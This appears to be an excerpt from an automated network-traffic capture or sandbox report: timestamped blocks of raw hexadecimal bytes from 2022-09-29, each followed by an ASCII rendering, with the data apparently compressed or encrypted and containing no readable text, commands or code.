                                                                                                                                                    2022-09-29 12:59:18 UTC27649INData Raw: 0a ad d5 6f e1 a9 30 af c1 44 b0 ae cf fb 17 5c 94 b6 bf 24 be 7d 54 fb 56 9d b3 b3 a9 c4 75 50 ea 25 b6 17 7a ef 56 6a d9 64 68 cc 0c 10 34 89 ad 6e a1 de 45 28 a2 90 db 6b ae 53 17 fc 5d 4f 58 61 8e 18 49 d9 cc 15 25 bd 29 bc af 23 5f 39 f4 ec e5 4b ee 28 ae cd 34 73 62 6f d7 ee c5 b6 2a b5 34 78 22 24 7e 51 3d 48 c2 1a 06 8a 07 97 f4 6f 28 fe b2 e0 80 76 73 e8 99 e6 fe d2 04 9a d9 20 cc d1 db 90 dd ab bf 22 1b 45 50 e9 2b 37 17 a0 45 bf 7a 13 05 0e 63 ae b2 91 f4 90 f5 67 5f a0 67 49 8c be 28 8a 3e 29 24 b4 aa a1 c5 3a 32 b3 8a 48 31 da a7 53 c3 59 a7 b2 d7 f7 27 ee 44 be cf 00 d1 50 f7 59 fe f9 56 bc c5 d1 6f eb 1c ea 5c 28 13 0f a0 aa 57 5f 21 62 b7 28 34 66 45 06 c1 fe f4 85 e9 ca 69 e8 3d 7c 5d 7b 2a 78 30 4c cb 12 fe fe 90 cf b0 70 66 3e bb a7 f5
                                                                                                                                                    Data Ascii: o0D\$}TVuP%zVjdh4nE(kS]OXaI%)#_9K(4sbo*4x"$~Q=Ho(vs "EP+7Ezcg_gI(>)$:2H1SY'DPYVo\(W_!b(4fEi=|]{*x0Lpf>
                                                                                                                                                    2022-09-29 12:59:18 UTC27665INData Raw: b5 03 39 5c 80 be 14 da be ee 0a 9d cf b8 2f 9e 83 9c 33 c1 cb eb 64 29 45 31 54 0c 7b 66 34 4c 5b 72 66 9c 93 01 bd 8a 52 1e 90 f8 56 37 60 98 ca 0c c1 d5 77 0c a7 7d 69 c1 22 55 56 e8 41 21 2d 26 ff 24 ae c9 94 9a 43 52 d9 c4 73 61 a3 f4 c9 39 1a ef c2 4d 4f b8 39 37 82 0d 42 3f 86 da d9 77 11 cd 81 3d 80 d6 67 6a cd c6 c3 49 ed e9 e9 83 3e d4 c1 78 e4 03 3c 9b 93 fa a1 4e 4d 22 bf 99 e7 99 3b 67 74 18 cf a1 31 0c ed f8 34 71 34 f0 49 44 4f af 11 69 5c 29 7b 9f 89 b4 aa 6b cc b9 c8 51 2d ed 14 5a ad 38 6d 89 df 83 88 fc 50 7b 3d 72 bb 09 f1 5f 9a cb 98 25 c3 f9 aa f9 33 ae 5f 0d 35 50 22 dc 54 1e ef 46 71 9f c3 e7 57 48 83 2e e7 b7 ca 04 38 41 10 fe d1 24 af c3 1c 74 cb bf 97 79 ad ab 2b 14 15 32 ab 04 53 66 56 6e cf 98 bc 83 90 b2 9b 46 c3 24 0c 48 58
                                                                                                                                                    Data Ascii: 9\/3d)E1T{f4L[rfRV7`w}i"UVA!-&$CRsa9MO97B?w=gjI>x<NM";gt14q4IDOi\){kQ-Z8mP{=r_%3_5P"TFqWH.8A$ty+2SfVnF$HX
                                                                                                                                                    2022-09-29 12:59:18 UTC27681INData Raw: dd ad 9d 45 a4 74 02 2e b2 93 03 c7 64 ab e3 12 ca de 96 91 76 2a 4e 8b 60 fb f1 a5 08 df d0 54 76 e0 c5 52 5d 3f 63 90 67 f2 32 e9 6d a0 b3 01 82 db 76 da 5f b6 66 c4 db 7d 77 39 c8 8d 21 88 a7 6c bf f9 af 7d 49 b1 51 2e f4 36 38 83 75 b4 f9 3e af d4 e9 f4 cf 16 68 d8 91 2c 10 6c 2d 74 74 13 ee 20 9f 45 57 66 9d 64 4d ac c9 df d5 db 95 69 9f 09 0a 9f 3e d2 ef 6c 1f 66 29 f0 c4 86 76 d6 3c c7 77 3b 4c b1 5c ef 33 f2 e2 9a df af 0a 77 06 96 16 6c 89 fa 64 10 ea eb c0 49 8d e8 b5 32 8b 31 c6 f5 fa f3 b2 be d2 ff f7 14 b7 af eb b9 f0 83 76 69 44 b7 31 99 ef a7 b2 75 0f de d5 2f 41 af b4 5b 06 14 f1 bd 50 6d 11 5b 07 6c ca 30 9e 06 b3 36 0c aa f4 b3 10 34 41 2d 45 20 d9 51 1b 8d be 20 56 92 cd 7e 30 cc 7f 01 b6 54 3b 4f 80 29 66 1a f5 ca cc ef d2 d7 7a 56 c2
                                                                                                                                                    Data Ascii: Et.dv*N`TvR]?cg2mv_f}w9!l}IQ.68u>h,l-tt EWfdMi>lf)v<w;L\3wldI21viD1u/A[Pm[l064A-E Q V~0T;O)fzV
                                                                                                                                                    2022-09-29 12:59:18 UTC27697INData Raw: 57 82 d7 d7 01 6f d5 5f 83 dc f1 7e 6d cf bd 18 9b 04 33 e8 ca 88 7b e2 c6 9d a1 9e 18 5f 16 a8 44 6e 08 df 92 94 27 1c 0a 10 c0 52 c0 33 a4 e4 5f 2c d7 34 12 10 96 7a df f7 a5 7d 3e c9 20 e7 5a d8 60 3a ef 23 33 53 39 f5 a0 f2 06 14 72 83 e5 82 e2 39 c1 df d9 1b 9b 54 71 63 0e c5 ef 31 01 34 54 15 1b 9d 48 9a 1c b5 32 fa 5f e6 4a 9e 6c b8 7f ef 46 6c e2 fa fc a9 d1 8d cc ff 5c b3 a6 d1 fb 13 bd 14 fe 77 f8 32 bb d7 01 30 16 8d bc d1 64 b9 09 25 c7 a6 7f 47 ba ed f2 65 b2 16 96 7f c9 e3 91 3f c9 62 8c c6 df c9 ef 87 41 25 c5 7f 13 5c a5 d2 e4 b6 98 04 d6 a2 53 4e 43 07 36 d3 1a ca cc f2 9a 58 7d 65 34 23 4d e0 ae 7c aa 4e b7 7b 30 a1 d4 64 f4 47 29 f8 74 d3 ce a3 7b 66 c9 e3 88 d7 9c 23 26 c4 20 6d 72 b0 03 88 f0 71 ff b0 b1 de d8 8d 46 e3 8b 6e 3e b4 8c
                                                                                                                                                    Data Ascii: Wo_~m3{_Dn'R3_,4z}> Z`:#3S9r9Tqc14TH2_JlFl\w20d%Ge?bA%\SNC6X}e4#M|N{0dG)t{f#& mrqFn>
                                                                                                                                                    2022-09-29 12:59:18 UTC27713INData Raw: 4a 4a 80 20 e9 08 63 a0 20 52 78 a0 4b 1e 91 df c3 98 a9 01 33 8e 4f e9 b6 83 87 9a d6 cd a0 4e 01 5b 59 0e 99 77 85 2a 9c 15 6f e5 ce d6 3c d6 05 23 6a f8 6b 42 97 79 7d 9c 9f a8 61 77 68 3e f7 39 76 9d 72 0b 3d 63 39 09 ac 15 d4 bd 8f ec 72 3a 31 43 e8 d2 9a 10 96 72 b7 4c 88 e0 df 7e f6 c8 25 86 23 88 88 bc eb 3c 25 ff 5e 98 3b 01 1a 9a f6 cc 9c e2 e2 28 73 9b c6 8a 7c 6c c6 35 cd da 2e 61 7c 8a c7 b9 f5 c2 e3 7e cc 5d 96 02 e2 39 bc 41 90 73 98 4b ae 36 23 ad 5e a2 99 61 b0 db 06 12 2d 4a 3a 5e e6 6e 23 03 51 36 b5 27 d4 2a cc 3c 49 f4 31 b6 27 e7 c5 d2 4b 3e 4c ef 89 42 82 70 63 9f 30 f8 5a 50 65 74 e4 01 46 60 19 92 85 d0 e1 b5 08 39 05 77 63 bc 34 75 ed 59 a2 a3 18 c3 32 2d 2c 54 4e 2e 18 de e9 fb db 16 b2 c8 8b e2 74 3f db 16 29 d8 ce 9c 60 93 74
                                                                                                                                                    Data Ascii: JJ c RxK3ON[Yw*o<#jkBy}awh>9vr=c9r:1CrL~%#<%^;(s|l5.a|~]9AsK6#^a-J:^n#Q6'*<I1'K>LBpc0ZPetF`9wc4uY2-,TN.t?)`t
                                                                                                                                                    2022-09-29 12:59:18 UTC27729INData Raw: 19 4c 56 c4 fb 08 c2 10 d8 31 ce 21 c1 8b 33 85 59 40 f4 b0 92 74 b4 53 03 d8 c5 cf d0 3f 00 cb 61 8f 26 41 bc 6f aa a7 e6 13 b8 04 39 60 45 f1 fc 51 a6 66 2f 06 10 c6 97 a3 62 83 85 1e b0 0b 18 32 7e 38 8f 25 ba 08 3c 55 2d 8a 36 fd f1 09 b9 66 20 d0 25 be 03 b1 16 42 4e 91 fd 7d a0 dd 22 36 a5 63 29 3e 82 33 63 7f 26 78 17 97 ca 5b 3a 38 b9 c7 45 43 b0 7e 23 6f ec f5 c9 6b 17 7d 80 ad ac 33 c1 82 78 a7 90 aa 1a f2 6d cd b7 19 4b 98 ca a6 d5 7b ad 93 65 53 ec 9f 38 30 e5 2a 04 0f 94 f1 36 bc e5 7a 35 ac 79 a6 f9 11 1c f3 ed 8f 00 6a ff 93 70 d1 f3 b6 d8 2d 26 a5 aa e7 4d 7e 0b 7a 08 1c 90 c1 25 6e e4 25 dd 61 ad cb 96 85 43 82 2f d2 60 22 31 39 4c 6c 79 80 af f1 d8 71 d2 f5 8a ef c6 37 6d 45 82 10 fb af d9 ed 0f d9 0c bc ee bf 82 a9 37 96 cf 42 72 d9 fa
                                                                                                                                                    Data Ascii: LV1!3Y@tS?a&Ao9`EQf/b2~8%<U-6f %BN}"6c)>3c&x[:8EC~#ok}3xmK{eS80*6z5yjp-&M~z%n%aC/`"19Llyq7mE7Br
                                                                                                                                                    2022-09-29 12:59:18 UTC27745INData Raw: 00 d7 2d 07 30 03 c5 6e 82 2a 14 74 b3 1a 39 7b e0 d9 d8 00 3b 5d 8d 3c cc 2e 86 b1 9d 49 e2 44 0e 9d d1 10 b7 4c 45 97 c8 e9 31 18 b0 bd ef 97 8d 57 24 d3 20 ce ae 7d 04 65 1c d8 55 3a 50 94 df 0f df 10 af f1 9e b9 20 a1 71 23 7b 5b b0 c2 f5 10 2a 33 6c 87 06 52 6a 17 6b c4 e6 de b4 4a 57 5a e6 65 28 62 2b f5 a3 16 9e 11 d6 32 3c ec 29 a7 5d d7 8b db da 94 0d be 9b 2b 5b 12 b9 5d a9 b6 92 7f fd bb d1 0c a4 dd 24 e6 95 08 c5 fc 67 02 ec 05 94 b1 4b c1 66 1a 01 24 64 54 04 38 fe a8 2a e7 35 8c 81 5f ef 64 79 ec ef 28 4a 6f 5e 80 52 57 6f 76 ca 7c 70 d2 a3 de 17 c2 d1 54 b9 9e 18 4c 5d 73 e2 10 0d f2 d6 16 fc 57 ce 29 68 11 a5 16 83 bd 07 d5 0a 56 73 f1 26 ad 62 90 1a f9 d5 83 29 61 34 97 98 b3 95 be 82 d5 48 26 48 e5 8d 75 6b 58 43 c2 8e 7c cd 4f 76 03 68
                                                                                                                                                    Data Ascii: -0n*t9{;]<.IDLE1W$ }eU:P q#{[*3lRjkJWZe(b+2<)]+[]$gKf$dT8*5_dy(Jo^RWov|pTL]sW)hVs&b)a4H&HukXC|Ovh
                                                                                                                                                    2022-09-29 12:59:18 UTC27761INData Raw: bd 0f 6a 58 a6 d7 a1 1b 4e f1 ba e7 3c 87 e4 b5 c8 24 fe e5 a7 e4 ca 0d 98 ff 54 c0 de e8 41 33 f2 b5 75 df 3a 5e 73 c2 b5 83 ae 8a 9e 2a 7a a5 a8 c7 5b 2f 69 a2 5c 77 29 6f 85 1d 9c b7 dc 70 4a 1f 6b 16 28 78 72 72 2c 4a 57 30 e3 dd c6 34 57 91 41 01 4f 68 13 ca df e5 5f 2c 9a 8b b2 d1 6a de e6 2b 23 42 24 50 3b 7d 3b 30 2a a3 0a 4c cb c9 2d a2 06 b0 09 85 14 61 17 5f f6 e5 aa d6 26 9f 4e 7e 30 6a 31 85 9d 38 d3 dc f3 1e a8 cf f8 87 83 64 6d 1c 78 99 c5 c3 4f fe 13 e7 7a 6c 18 41 c5 55 88 84 fc 1e 5b a2 cd 01 be 55 ed 9d 63 d4 b3 0d 9c 77 5b 53 da b7 78 80 a8 45 cd 08 63 9f 12 15 05 85 f9 97 c7 25 af 0c df e3 04 2c fd d7 b3 bd 23 ab fb 7a 8e fb c3 8d 44 67 24 2e b0 50 6d a3 1e 7f 8a 94 6d 47 eb 97 33 ec d3 b1 7a ab 05 66 5c 91 04 e0 00 33 62 eb 7f 1f 58
                                                                                                                                                    Data Ascii: jXN<$TA3u:^s*z[/i\w)opJk(xrr,JW04WAOh_,j+#B$P;};0*L-a_&N~0j18dmxOzlAU[Ucw[SxEc%,#zDg$.PmmG3zf\3bX
                                                                                                                                                    2022-09-29 12:59:18 UTC27777INData Raw: 6f eb 4f b1 86 8e 77 f4 de 96 6c 20 3e a8 de 00 ec ef 54 e9 a6 a2 fb 3f 6c f5 21 75 ac 7e 33 55 1b 14 6e 99 b5 28 eb f1 14 92 40 1f e5 f4 5e 7d 0f 64 d2 22 47 8e f1 86 c7 e1 d5 e9 a7 13 a8 83 05 c0 00 96 29 85 af c3 b5 fc ad d9 dc e4 96 ec ab ab a9 29 b4 b9 e9 5e e7 6d 49 b1 d4 65 b7 d1 c0 35 39 df 2d f1 cc f8 19 5f da d7 3e 3c 6f 11 27 ba 1d 20 49 77 4d 09 a2 e8 20 05 f6 ac 87 96 d9 6d 8c 3c 83 bc e6 e8 6e c1 f0 f0 68 85 82 9e 09 74 ef e2 56 e8 41 67 7b 47 b3 62 15 58 bc e6 b1 18 78 f7 bd fd 59 57 10 04 4d ba 5f 63 50 82 59 8e 9a 17 49 d9 c7 d7 c6 22 40 b2 96 6f 40 1a 7e df 9a 0b 41 c2 a6 df ff ae 43 c9 b9 42 19 b1 4f 10 fd a3 c4 c6 34 3e 48 fc 46 8d 19 10 f1 ce fb 3b a1 98 30 65 71 4b a8 a6 80 e9 9a 05 42 6d 5e b0 89 49 88 58 4d c0 87 97 c4 66 f2 77 aa
                                                                                                                                                    Data Ascii: oOwl >T?l!u~3Un(@^}d"G))^mIe59-_><o' IwM m<nhtVAg{GbXxYWM_cPYI"@o@~ACBO4>HF;0eqKBm^IXMfw
                                                                                                                                                    2022-09-29 12:59:18 UTC27793INData Raw: 38 df b8 e6 3e c6 12 19 73 2b 59 39 4c 5a bf cc ab 9d 3d ac a2 3c ef 04 e8 ee e0 5d a5 da 32 72 a8 34 89 70 b5 be d7 28 7b d4 92 ef ba c5 6e 7b d8 a2 34 58 f9 ef 75 9c fe ec 5a c5 80 02 86 92 55 91 66 a3 5a da 60 58 8d a2 a4 82 3c 9a 3f 3f 6f b8 62 43 33 b9 11 97 9f 21 8a ef 20 e6 9e 8d ec 7b a7 6b 31 bb 7f 67 28 57 98 fa 75 09 dd b0 84 e4 26 3a 19 4d 84 8e b9 db dd 35 f1 13 6c 5b 48 70 da cb c7 fb a2 5a f5 48 16 1d 4d 1a 56 ad 67 72 49 82 82 bd 5e e7 b5 61 1e 60 e2 bb e6 b7 aa b4 3a 1e a3 54 06 8b 40 48 be c4 4c 03 51 d6 d0 72 1b 93 c8 77 2a 8a 56 d7 ab e4 9b f9 ae ff 49 4b 6b ab 0e e9 db 5d 4b bf 9b 7c 82 0f 9d 6c 95 75 ca f5 3d 43 fb 8d f3 42 82 df a5 71 51 25 9d 08 a0 6d 38 7c bb 70 82 cb 6f 98 23 0b 12 40 09 89 ca b7 b8 20 2f 51 94 3b 79 3c 9a 6f 2d
                                                                                                                                                    Data Ascii: 8>s+Y9LZ=<]2r4p({n{4XuZUfZ`X<??obC3! {k1g(Wu&:M5l[HpZHMVgrI^a`:T@HLQrw*VIKk]K|lu=CBqQ%m8|po#@ /Q;y<o-
                                                                                                                                                    2022-09-29 12:59:18 UTC27809INData Raw: e0 40 0c 90 e7 b9 9c be 82 3b 08 b1 ab 25 75 3d b7 a1 c6 f6 27 57 87 b1 39 e2 98 e1 5d a9 d4 7d 48 30 82 5b d2 16 67 96 7e f4 2b c8 50 3b 84 06 3a 87 5d 05 ca fb 99 3f 99 95 d5 fc 2c da 03 30 09 15 b8 db 62 53 0f 08 7b 90 ba 45 32 4c 22 57 b2 7f 80 2c 46 0c c5 56 fa d9 55 a6 2d 71 63 da 80 9a fa 71 97 c9 a0 5c 0b 11 01 b5 70 69 eb bb 8f 2b 7c 80 ee 43 ec 4c ba 4e 73 70 45 f0 b8 65 5e 7f 60 2c e7 bd 9c 9c 22 7e 60 3b 00 94 c5 7c 2a 18 d2 cb 61 1c 8a 32 93 a8 da a2 c9 b1 73 2b 44 b6 21 c7 75 6e ef 84 47 fa 25 0a 6b a1 34 6e 76 c8 65 fc c5 de 7d ed 1d 0d e4 31 f4 db 32 2b 24 2d 3c dd 2c 6a 6a 61 ce 96 44 1d bd da c1 f5 a6 96 b8 cb 0e 7c 54 6c f9 60 10 c3 a7 69 2c d3 78 cf 4e 70 91 ce 7d 6c fc f5 75 80 7d e6 6a f0 78 a5 63 ca 0b ce ca df de 92 74 7a d9 35 bd
                                                                                                                                                    Data Ascii: @;%u='W9]}H0[g~+P;:]?,0bS{E2L"W,FVU-qcq\pi+|CLNspEe^`,"~`;|*a2s+D!unG%k4nve}12+$-<,jjaD|Tl`i,xNp}lu}jxctz5
                                                                                                                                                    2022-09-29 12:59:18 UTC27825INData Raw: 25 9d e0 df f1 c1 c0 76 a0 a7 30 70 88 ed 37 ae df b0 88 07 6b 16 84 67 28 85 cb 73 50 dd ff 36 48 7e 71 74 d0 3c 09 7b 32 1e fa f9 e0 66 90 07 02 b4 18 18 8c fa a7 e7 71 2a b3 e4 5e 2d 56 6e a4 09 fd 5a ac dc 27 05 db af 9f 87 4d 16 77 64 ee 2a 6c 25 37 3f 04 a3 4b 64 7c 78 93 73 b7 11 d1 c8 ba 70 4f 33 f1 0f c1 c5 f6 02 c8 e2 a4 d9 c1 1e ad 24 02 0b 11 b7 96 bf 73 5a c1 c1 68 13 79 fe be 41 b2 f0 5d 5c ec 28 9f 32 70 12 27 6a 49 28 28 08 e1 96 b0 04 a8 43 1a 08 ca 57 c6 97 52 8a 2f ad b1 43 6e 1e 9c c6 1e 05 57 8d a2 cf 67 80 be 55 4f 89 2f 1f 92 23 2c 9b 20 7a 66 c7 45 6b bc 29 6b 29 cd 74 ef 4a c8 1e 1b e8 65 b3 98 c8 8c 5a cb d5 75 ff f8 35 56 70 1c 0c 55 70 f0 2d 67 70 a9 50 49 4e d5 39 8f 8c fe a9 c3 54 47 b7 c5 d7 0c a1 50 b5 af 11 d8 d2 33 12 3c
                                                                                                                                                    Data Ascii: %v0p7kg(sP6H~qt<{2fq*^-VnZ'Mwd*l%7?Kd|xspO3$sZhyA]\(2p'jI((CWR/CnWgUO/#, zfEk)k)tJeZu5VpUp-gpPIN9TGP3<
                                                                                                                                                    2022-09-29 12:59:18 UTC27841INData Raw: ec c3 9a 3d 94 f6 48 80 cb 4a 1f 72 1c 64 59 aa 6c dc 87 46 2f 98 bf ab 73 8e 4c c2 e2 bd 6a ca 19 b8 91 26 9d 5c 3a 77 d7 a4 f0 0e 33 81 95 82 d7 f0 c9 aa 7a 6e 0f 17 56 8c 19 82 b4 6e 1e a9 bc 07 fc 91 90 07 0b 55 59 b5 12 0b 5e 06 86 39 23 db 18 d8 8c 36 04 88 e4 51 0d 7a db 2b 61 9a 9b 79 70 44 ac fd 1b 37 3a fd bb 4f e4 45 91 b0 87 c5 36 d2 3f 66 1a a0 b8 6f 49 fa db 24 18 4c bd 1c a0 34 32 ca 5e bd f4 00 52 6c f5 b5 81 64 9d 63 e8 7a 4a 0c 96 b8 e0 05 18 ec 8d 8b f1 c5 87 a4 63 5f e5 00 8a ae 5b dc 9b 0b 0b 61 9a 24 f4 1f 57 f1 6e cc b6 3e af 4e 7e 00 05 33 70 6d 1a 7d 32 9b 16 73 a9 ac 3f 8c ba a4 fc 1c 45 7a 37 4b e4 e4 19 7b bf 84 26 95 9a 3c 49 69 33 a8 cc 7d 47 3f 37 d5 b6 c7 64 a7 a5 29 0a c9 23 a0 80 84 5f 81 39 ac 27 94 fe ee f8 1c 3b 5b 46
                                                                                                                                                    Data Ascii: =HJrdYlF/sLj&\:w3znVnUY^9#6Qz+aypD7:OE6?foI$L42^RldczJc_[a$Wn>N~3pm}2s?Ez7K{&<Ii3}G?7d)#_9';[F
                                                                                                                                                    2022-09-29 12:59:18 UTC27857INData Raw: 80 64 f9 61 16 cf e8 ee 59 39 32 3a 36 ed 0a d6 aa 40 03 22 d9 90 89 76 43 ae 6e 8d 93 bf f2 17 de d5 9d 40 3c 01 39 fe b8 42 b7 94 f7 a0 3c f6 a5 fc 1d 43 56 37 15 38 11 52 fe 19 c0 da 0f 49 88 32 fc b4 af c9 a8 39 02 d3 7d f2 ae 25 15 fe 00 13 fe a5 77 e2 8c 68 d0 1d 4b d3 62 45 65 ac 04 fb 50 4e 4b fc 20 14 f5 a3 cb c6 c0 df 51 13 88 47 7b aa b9 28 91 12 f2 74 b4 47 a0 20 73 40 d6 e3 c4 26 17 b9 71 59 88 c5 05 0d 84 49 53 18 cb e4 93 28 2a 01 9f 86 88 23 94 1b 20 ce 73 da c9 79 61 90 9d 51 b5 d3 95 05 26 53 51 45 92 84 72 4f b5 a0 d3 59 02 f8 9a 45 fe b5 d3 f8 8e 66 e3 aa 47 2b 7d 24 e0 d0 2d 48 58 f7 5a a8 68 84 42 2f 5a 08 1d 26 86 52 19 04 76 3e 5d c1 a8 7d 23 1a 87 36 2b 18 bd b9 12 a7 bb 0c 6a 8d 9a 19 3e 51 15 e0 6e 35 a1 a9 08 0d fb c7 a8 61 65
                                                                                                                                                    Data Ascii: daY92:6@"vCn@<9B<CV78RI29}%whKbEePNK QG{(tG s@&qYIS(*# syaQ&SQErOYEfG+}$-HXZhB/Z&Rv>]}#6+j>Qn5ae
                                                                                                                                                    2022-09-29 12:59:18 UTC27873INData Raw: c5 d4 f0 a0 b7 70 65 04 c1 8a 02 b4 96 31 75 f9 4c 3a 39 81 cd e0 b5 89 b6 b8 af 9c 9f 1a 80 16 8c 8a 31 be c1 46 9e d5 de 7a f8 d7 da 0a 33 52 66 4e 90 cb c1 64 b9 7e c9 71 11 8e fa ac cb 32 f2 71 bd 1e f7 63 57 28 fa 4f 02 bb 0c fd e5 6b 0a 46 ff e2 41 45 27 ea 18 93 99 49 ec b5 32 4e 5d 30 09 03 94 7c 28 f1 a6 65 3c cb 23 f0 b8 e9 7a ae ac 87 4f 1b bd 73 74 12 c0 97 df aa 4b 91 df 1a 72 ae 5b 74 d3 4f 93 50 b5 91 04 86 e6 a7 78 60 c3 1f 7a ea 9c 22 c4 64 45 d2 a5 b5 8e d5 f1 3b 2b 70 7f 89 1d 2c d7 f0 25 5e f4 a2 6c 6e 05 d6 cb 0c 7b 37 41 45 6c 39 3a 1a 90 45 c3 30 b7 72 47 8f 7e 75 57 12 88 79 f1 3d 45 1f d8 b1 eb 41 fd c0 33 40 85 5c 7d f7 31 ca d7 61 02 29 42 4e ef 3b a3 10 99 78 3c 39 b3 86 a1 7d 33 e7 c4 65 67 ad f1 00 bb ef 9d a1 a6 5e b3 5a 51
                                                                                                                                                    Data Ascii: pe1uL:91Fz3RfNd~q2qcW(OkFAE'I2N]0|(e<#zOstKr[tOPx`z"dE;+p,%^ln{7AEl9:E0rG~uWy=EA3@\}1a)BN;x<9}3eg^ZQ
                                                                                                                                                    2022-09-29 12:59:18 UTC27889INData Raw: 4a be ad 30 cb ef 24 5e 75 ba ef 6e 6e 81 c3 6c 53 8f 77 87 3e 62 70 1a b6 24 9e 6e f4 b9 7b 30 66 40 82 4a 63 47 8c 91 bb e5 00 c3 31 2b d9 a0 2c a6 26 61 ba 7e 22 19 a3 4e bd 5b 1d 21 e1 ec 22 0a d9 64 34 97 66 6b c6 e9 68 95 1d 05 00 4e 5c d6 55 00 3b 87 d2 35 dc 85 d7 14 63 7d cd 0f ba b5 05 cd c6 e0 6b 0a d8 df 50 6f 3a 6a 16 21 09 57 73 b8 36 73 a2 82 26 dc 95 31 c1 46 72 cb e6 f8 ee d5 35 15 9b 75 7c c8 e4 45 d4 3d cc bf e4 0d 76 97 c6 a9 51 02 c4 31 81 b2 15 b3 90 8a a7 33 95 61 a5 d4 2f 09 ae c8 38 bc 6c 0a f0 30 d3 0d f8 39 50 1a 32 47 54 c7 0d 26 b2 54 6d 1f 16 e9 5a 49 da bd 77 b9 ee 10 55 d4 99 c7 68 dd 3f e3 9a ee 3b 3f ac 30 07 ef 69 fa 17 17 3a 7a ee 86 41 bf 7b 31 99 8d 13 9c 11 81 8f 2a 63 97 17 0a 8b a4 04 b6 97 5b ba 14 9f 71 81 19 e3
                                                                                                                                                    Data Ascii: J0$^unnlSw>bp$n{0f@JcG1+,&a~"N[!"d4fkhN\U;5c}kPo:j!Ws6s&1Fr5u|E=vQ13a/8l09P2GT&TmZIwUh?;?0i:zA{1*c[q
                                                                                                                                                    2022-09-29 12:59:18 UTC27905INData Raw: ee 11 c5 86 56 0d bc 0d fb 36 ce a9 7e 14 d2 b0 90 d2 6d c1 b1 ec 3d af bb 30 20 2b 4d 89 ed e3 20 fd 0c 21 08 55 9e ee 4e 7f 00 32 02 03 0d dc ae 73 4d da cc d2 19 a3 85 42 10 40 73 6b 05 73 a6 bb ef 05 38 5c 3f 03 6a 69 e3 1d 51 c9 4d d8 af ee be 94 b7 d1 27 20 e9 83 e1 32 41 03 0d 62 84 22 6a 9e 28 47 81 0f fe e7 e6 16 30 bf 74 8f c6 17 a8 15 64 db 07 10 e5 01 9a 4a cc 7f af 1d f0 94 2c 7e 3a ba 8f 38 90 65 cc 0a e5 75 48 05 15 71 a7 b9 58 6c 9a 86 57 1f ee d5 0b 98 4f 91 5e 2d 47 03 2c ea cc 16 58 00 da 3a 3d 87 0e d2 95 7d 7f d9 9e 0b 8e 40 42 d6 7e a0 b0 57 63 ff c0 8a ee 70 f1 8e 5f ae 15 df da 5b 91 b0 3c 7e f6 bd 62 26 9f 11 3f 7c fc 2d 6f 3b f2 f8 97 c5 27 74 74 0a fc fc 3b b4 92 8d a3 f4 14 10 6a d1 40 a9 59 e5 98 2d 97 f8 ce fc 8b fa dc 90 4e
                                                                                                                                                    Data Ascii: V6~m=0 +M !UN2sMB@sks8\?jiQM' 2Ab"j(G0tdJ,~:8euHqXlWO^-G,X:=}@B~Wcp_[<~b&?|-o;'tt;j@Y-N
                                                                                                                                                    2022-09-29 12:59:18 UTC27921INData Raw: 83 e9 9f 9f fd d9 f2 f9 96 4d c1 d0 3b 60 14 2e d5 65 b0 46 cb 72 4f eb b6 e8 4a cb ad 3c ee c2 d3 26 0e 69 b0 cb 2f bf bc a2 4f 48 b8 80 11 6b aa a3 00 70 4d 4a ea 44 9d 6f 49 d9 0a 4c 07 d2 fc af ea bc bb 5e 60 0f dc 1f da 91 f2 67 9c d9 f9 91 93 9d aa 58 2e 0e cc a8 e5 08 6b f5 86 d9 ee 58 87 d5 c2 b6 f0 81 c2 90 66 28 82 26 96 3b 9d 55 3a 57 41 c2 fe d1 2d 00 ac a3 20 0b 49 17 78 d9 ea 81 e2 73 e6 75 f8 1b 8e 05 2c 49 e3 c7 5a 7a 25 3d dc e9 42 58 f9 fc 73 45 90 12 1a 0b a0 61 2d 19 e7 89 bd ff 55 ea 60 d4 2f 70 b5 17 ad 5a dd 56 84 6c 99 bd eb 2d 2b 1f 87 f9 d8 e3 ce c6 0d 2f 78 84 8b 93 0b d0 6e 9a a1 a3 54 20 af f1 84 8f e6 a7 0f ef fc 96 db 18 22 10 04 50 17 e5 9a cc b7 04 b7 1d 4d c9 4f f7 ea b7 77 43 4a 0d 43 53 51 3f 1a b6 de 81 28 7d ed 73 a6
                                                                                                                                                    Data Ascii: M;`.eFrOJ<&i/OHkpMJDoIL^`gX.kXf(&;U:WA- Ixsu,IZz%=BXsEa-U`/pZVl-+/xnT "PMOwCJCSQ?(}s
                                                                                                                                                    2022-09-29 12:59:18 UTC27937INData Raw: 17 99 14 56 1c fe f2 f7 57 3e 36 c0 8f 2e 5e 0f da cb 28 f8 b7 ed c0 89 10 12 78 80 60 82 f4 fd 2b c6 48 78 e4 dc 2f 44 83 d3 83 dc 45 93 70 0a b7 5c 24 cf c4 09 8b 87 11 d4 23 1b 95 68 19 bf 01 d1 f2 00 49 b0 ef 4c 10 ec e2 2c d1 b6 a0 c9 5b 6c d0 61 b7 82 ed 79 1c e8 c8 03 69 a0 c5 ab 0e 61 4f 3e 4f 29 01 2e e0 27 3d f4 93 9d 54 f6 9f bd c7 21 84 cc 60 e5 b5 f3 5e 5b 50 c5 ab d5 9f f4 64 a9 25 d2 be b2 35 1e 67 fe d0 60 be 7e 9e 17 29 47 5c 8b 16 b4 bb 01 b3 81 4c 23 4a 79 aa 80 ea d6 16 e4 37 62 ed 6c be 1c 86 a5 e2 7d a8 a5 e8 b0 c3 a2 22 35 f8 b0 19 40 4e 4b 7b ae 75 23 05 6a 6d 0b 1d 7a c4 63 04 cc 5d 2d 26 11 fd 7f 66 dd b5 0c fb 98 a3 10 92 14 0f 74 e0 8f 76 81 cf 7d 8a 3b 2c d1 48 6a be 5e a0 fa ed dd 47 ce 1e 70 20 c7 3c 2b 0a f1 56 ac 88 cf fc
                                                                                                                                                    Data Ascii: VW>6.^(x`+Hx/DEp\$#hIL,[layiaO>O).'=T!`^[Pd%5g`~)G\L#Jy7bl}"5@NK{u#jmzc]-&ftv};,Hj^Gp <+V
